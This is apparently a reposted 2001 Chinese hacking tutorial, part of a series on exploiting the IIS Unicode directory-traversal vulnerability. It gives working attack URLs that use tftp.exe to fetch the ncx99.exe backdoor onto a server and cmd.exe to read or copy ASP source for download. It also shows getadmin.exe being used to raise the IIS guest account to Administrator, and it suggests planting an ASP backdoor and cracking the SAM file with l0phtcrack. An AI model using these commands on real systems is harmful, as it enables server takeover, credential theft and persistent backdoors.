![[ 永远的UNIX::UNIX技术资料的宝库 ]](/images/title.gif)
|
| 首页 > 安全技术 > 其它 > 正文 |
 |
| UNICODE编码漏洞全攻略-7 |
| 作者:badboy 坏男孩俱乐部 (2001-05-20 20:10:01) |
—————————————————————————————————
badboy 坏男孩俱乐部
这并不是什麽权威教材,只适合菜鸟了解win9x、NT存在的不安全面,切莫
用此方法在国内做尝试,如果你偏要如此,那麽由此引起的一切法律後果由
你自己负责。
本文只允许在网路任意转载,但须保留文章的完整性,如把本文作爲经济目
的使用,或者未经本人许可进行印刷、光碟杂、等出版性质的行爲,本人
将保留侵权控告的权利。
—————————————————————————————————
六、unicode编码漏洞提高篇(续)
4、TFTP运用
关於TFTP的运用我们在全攻略-5里面的工具介绍中介绍过,那工具可以在WIN9X
或者NT、WIN2K下执行,前提条件是需要你在本机上安装PERL伺服器程式,这对
于一般的爱好者来说稍微有点困难。
实际上如果你是使用NT系统或者你拥有一台NT肉机的话,就可以使用WINNT\SYSTEM32
下的TFTP.EXE这个软体了。
tftp/?
Transfers files to and from a remote computer running the TFTP service.
TFTP [-i] host [GET | PUT] source [destination]
-i Specifies binary image transfer mode (also called
octet). In binary image mode the file is moved
literally, byte by byte. Use this mode when
transferring binary files.
host Specifies the local or remote host.
GET Transfers the file destination on the remote host to
the file source on the local host.
PUT Transfers the file source on the local host to
the file destination on the remote host.
source Specifies the file to transfer.
destination Specifies where to transfer the file.
帮助是英文的,自己翻译吧。
在UNICODE上的命令代码∶
http://x.x.x.x/scripts/tftp.exe?-i+127.0.0.1+get+ncx99.exe
你放什麽软体都可以,我不喜欢木马,所以我也不再介绍你该传什麽木马上去,然後
怎麽啓动,那样走题太远了。
5、ASP相关问题
一般情况下,NT机器绝大多数都会使用到ASP写的WEB程式和SQL资料库。
大家都知道ASP代码的泄露意味著你辛辛苦苦写的ASP源码被人无偿获得,同时你的站点
也很容易遭到黑手。ASP代码泄露的漏洞很多种,同样,在UNICODE编码漏洞下,你的ASP
源码同样可以极易被人获取。
假设你的index.asp是一个很好的程式,那麽,入侵者可以通过type命令查看你的文件。
../cmd.exe?/type c:\inetpub\wwwroot\index.asp
或者通过copy命令
../cmd.exe?/copy c:\inetpub\wwwroot\index.asp c:\inetpub\wwwroot\index.txt
然後直接下载你的源码,通过分析,找到你的资料库文件。
如果你是使用SQL服务来做资料库的,同样,入侵者可以通过查看你的ASP和global.asa
源码,通过分析,找到你的用户名和密码,然後通过SQL远端管理用户端进行攻击。
那麽,你的商业秘密和网站的资料,还有什麽安全可言呢?
入侵者还可以在你的主机里上传一个ASP後门程式(ASE,应该听说过和用过吧)并隐藏
起来,即使你以後补掉了UNICODE漏洞,入侵仍可在他的ASP後门程式在你未发现之前,
查看、修改、删除你主机上的WEB文件。
6、获得超级用户许可权
可以通过下在你的SAM文件,利用一些黑客软体(如l0phtcrack)暴力破解。
也可以利用前面介绍的上传方法把gasys.dll、cmd.exe和getadmin.exe到目标主机,
然後通过一些软体或者方法获得目标主机的电脑名,再利用getadmin.exe把
iuser_电脑 升级爲Administrator
/scripts/getadmin.exe?IUSR_电脑名
那还有什麽事不可以做呢?已经等於完全控制这台主机了。
(http://www.fanqiang.com)
进入【UNIX论坛】
|
|
| 相关文章 |
|
===更多相关=== |
|
|
|
★ 樊强制作 欢迎分享 ★ |